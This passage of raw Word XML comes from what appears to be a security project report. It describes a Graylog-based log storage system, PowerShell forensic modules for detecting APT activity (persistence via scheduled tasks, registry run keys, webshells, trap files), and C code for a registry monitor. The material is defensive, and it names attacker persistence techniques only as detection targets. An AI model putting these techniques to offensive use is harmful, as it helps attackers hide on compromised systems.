      <w:r>
        <w:t>DLCH Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>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E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc485239597"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Centralized </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Storage</w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>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976DC2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc485239598"/>
      <w:r>
        <w:t>CLSS Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>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bookmarkStart w:id="92" w:name="_Toc485239546"/>
      <w:r w:rsidRPr="00EB4378">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3</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6</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EB4378">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Centralized Log Storage System architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00EE0D90" w:rsidP="00EB4378">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="93" w:name="_Toc485239599"/>
      <w:r w:rsidR="00EB4378">
        <w:t>CLSS Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>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F30840" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Search Engine implemented in Graylog, which is built into CLSS, help administrator to query and display log information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc485239600"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sentry: Forensic Toolkit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc485239601"/>
      <w:r>
        <w:t>Powershell for penetration testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell has changed the way how Windows is used, secured and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>also the way Windows is owned. It is an automatic platform for everybody:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> developers, defenders and attackers. PowerShell provides easy access to almost everything in a Windows machine and network. It comes installed by default in modern versions of Windows. During a penetration test, it could be really helpful to use this powerful shell and scripting language for further attacks and defense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276FCC21" wp14:editId="06F6CF08">
            <wp:extent cx="5487166" cy="504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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5487166" cy="5048955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C62525" w:rsidRDefault="00F30840" w:rsidP="00C62525">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc485239547"/>
      <w:r w:rsidRPr="00C62525">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3</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7</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sentry is executed using Powershell and Shellscript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc485239602"/>
      <w:r>
        <w:t>Sentry’s Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00994B42">
      <w:r>
        <w:t>Sentry implements some modules for analyzing the compromised APT threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-EventLog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>This module dumps some log data contained in the Windows EventLog Program for analyzing for analyzing and detecting malicious log activities. The malicious log content may be found in the Windows Security, Application and System aspect of Windows EventLog.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>Sentry File module monitor</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the integrity of system file</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t xml:space="preserve">, identifies specific known file name or string that correlate to any specific threat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-MemoryDump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRPr="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r w:rsidRPr="00D11FED">
        <w:t>MemoryDump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module is used in case a system has been compromised and need to be analyze using Memory Forensic technique. This process help respond team to statically analyze and identify the threat based on dumped image from the system’s running memory. Furthermore, a mini memory dump could also help respond team get more information about the current running system, its connected network and some advanced information which could be used to deduct any vulnerable exposure existed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C45442" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45442">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">This module helps in realtime monitoring system’s processes. Analyzing processes’ information which correlate to object could help respond team find the executable file, its hash, signature… Based on that information we can verify whether the showing signature is valid and use the file hash for </w:t>
      </w:r>
      <w:r w:rsidR="00C45442">
        <w:t>identify known threat according to malicious database system such as Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45442" w:rsidRPr="00D11FED" w:rsidRDefault="00C45442" w:rsidP="00F30840">
      <w:r>
        <w:t>Identify any port that has a connecti</w:t>
      </w:r>
      <w:r w:rsidR="00260563">
        <w:t>on established to the Internet. Also verify for connection’s duration, its correlate executable file which establishes the connection and identify how trustful the file is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00260563" w:rsidP="00F30840">
      <w:r>
        <w:t>This module verifies registry information using a list of registry keys. These keys are periodically checked for integrity and also identifies any suspicious keys added, such as the modification happened to “startup” registers. This module also verify the signature and analyze suspicious file using Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-SchedualedTask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t>Analyzing ScheduledTask database to identify persistent information that execute file, which is a method used in APT via vbscript, powershell, rundll32, regsrv32 and some suspicious executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t>Analyzing created services via analyze their information to identify the trustworthiness about the service’s name, its state, process that run via this service, process ID, signature and also using VirusTotal for checking those suspicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Sentry’s Trap module places trap in specific places, identify and alerting on malicious activities via logical computation. For example, placing a </w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which can only access using “NT Authorized / System” aut</w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t xml:space="preserve">hority, this file is never accessed for any reason until a curious attacker, who has successfully compromised the system and escalated to System authorized account, open the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F29DA" w:rsidRPr="00D11FED" w:rsidRDefault="009F29DA" w:rsidP="00F30840">
      <w:r>
        <w:t>This module helps in rapidly submit a suspicious file to virustotal via using HTTP query method, which implemented in available open API provided by Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00DB15A5" w:rsidP="00F30840">
      <w:r>
        <w:t>Scaning webshell based on webshell detector  (shelldetector.com), which identify web app files that contain malicious code via detecting known string, file name and file signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB15A5" w:rsidRDefault="00DB15A5" w:rsidP="00F30840"/>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840"/>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00F30840">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRPr="00CA1AEF" w:rsidRDefault="00E2646F" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc485239603"/>
      <w:r w:rsidRPr="00CA1AEF">
        <w:lastRenderedPageBreak/>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>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Furthermore, we will demonstrate how we test our implementation of APTIDS, DLCH and CLSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00A95E8E" w:rsidP="00A95E8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="99" w:name="_Toc485239604"/>
      <w:r>
        <w:t>APTIDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00A95E8E" w:rsidRDefault="00A95E8E" w:rsidP="00A95E8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc485239605"/>
      <w:r>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00910D7B">
        <w:t xml:space="preserve"> module’s source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>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1"/>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szRegConfig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 = CreateFileA(szRegConfig,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 GetLastError();</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ReadFile(hFile,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(dwByteRead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“iThread”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iThread = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4BC6" w:rsidRDefault="00C258C6" w:rsidP="00B0640C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The Reg</w:t>
      </w:r>
      <w:r w:rsidR="006B6E8A">
        <w:t>Config.conf is a configuration file using XML-like format. For reading its valuable data, we have to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 = (</w:t>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HeapAlloc(GetProcessHeap(),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(pRegKey[iThread]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"\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) + strlen(</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lpKeyStart =  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)strstr((</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lpKeyEnd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(lpKeyStart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lpKeyEnd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lpKeyStart += strlen(</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strncpy((</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lpKey, lpKeyStart, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpKeyEnd - lpKeyStart));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00B0640C" w:rsidRDefault="002565A7" w:rsidP="00B0640C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pP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lpTmp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 lpKey,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strncpy(lpMainKey, lpKey, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)(lpTmp - lpKey));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 xml:space="preserve">lpKey = lpTmp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lastRenderedPageBreak/>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strcpy(pRegKey[iThread]-&gt;stlpMainKey, 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strcpy(pRegKey[iThread]-&gt;stlpKey, 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hThreadArray[iThread] = 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(hThreadArray[iThread]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//ErrorHander(TEXT("CreateThread"));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memset(lpKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpKey));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memset(lpMainKey, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(lpMainKey));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Sleep(10);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stlpMainKey;</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stlpKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00211D26" w:rsidRDefault="00211D26" w:rsidP="00211D26">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RegMon then calls a function named WaitForSMultipleObject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 xml:space="preserve">WaitForMultipleObjects(iThread,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RegMonitor(</w:t>
      </w:r>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achSubKey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snprintf(achMainKey,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pRegKey-&gt;stlpMainKey);</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t xml:space="preserve">snprintf(achSubKey,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pRegKey-&gt;stlpKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A2690" w:rsidRDefault="00B0640C" w:rsidP="009B04F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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 xml:space="preserve">The values set to dwFilter indicate the specific aspects that a registry key </w:t>
      </w:r>
      <w:r w:rsidR="000D4E08">
        <w:t>must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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 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 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 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Default="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc484886366"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00856098">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dwFilter values and their meanings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00B0640C" w:rsidRDefault="00B91AB3" w:rsidP="00B91AB3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00224EDD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://msdn.microsoft.com/en-us/library/windows/desktop/ms724892(v=vs.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B91AB3" w:rsidRDefault="000D4E08" w:rsidP="00B91AB3">
      <w:r>
        <w:t xml:space="preserve">RegMonitor creates 2 Registry Handle for storing 2 parts of the parsed key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E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hMainKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="000D4E08" w:rsidP="000D4E08">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hKey;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D4E08" w:rsidRDefault="00401671" w:rsidP="000D4E08">
      <w:r>
        <w:t xml:space="preserve">The handle variable hMainKey is used to store a handle value for the specified main key. Since </w:t>
      </w:r>
      <w:r w:rsidR="006235EF">
        <w:t>Windows API does not used strings (like HKLM, HKCU,…) for working with Registry, we have to map these strings into Registry Handle values.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Convert parameters to appropriate handles.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(strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HKLM"</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HKEY_LOCAL_MACHINE</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HKEY_USERS</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"HKCU"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HKEY_CURRENT_USER</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"HKCR"</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HKEY_CLASSES_ROOT</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(strcmp(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"HCC"</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HKEY_CURRENT_CONFIG</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"Usage: notify [HKLM|HKU|HKCU|HKCR|HCC] [&lt;subkey&gt;]\n"</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6235EF" w:rsidRDefault="006235EF" w:rsidP="006235EF">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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006235EF" w:rsidRDefault="00350C9B" w:rsidP="006235EF">
      <w:r>
        <w:t>Depends on the main key value stored in “achMainKey”, RegMonitor map</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a regist</w:t>
      </w:r>
      <w:r w:rsidR="001A6FED">
        <w:t>ry handle value and stores it in hMainKey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="00D42C86" w:rsidP="006235EF">
      <w:r>
        <w:t xml:space="preserve">RegMonitor later reads the key using </w:t>
      </w:r>
      <w:r w:rsidR="004A69C8">
        <w:t>a function called “RegOpenKeyExA” for opening the key using 3 primary values:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hMainKey: a handle point to a specified root key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A69C8" w:rsidRDefault="004A69C8" w:rsidP="004A69C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
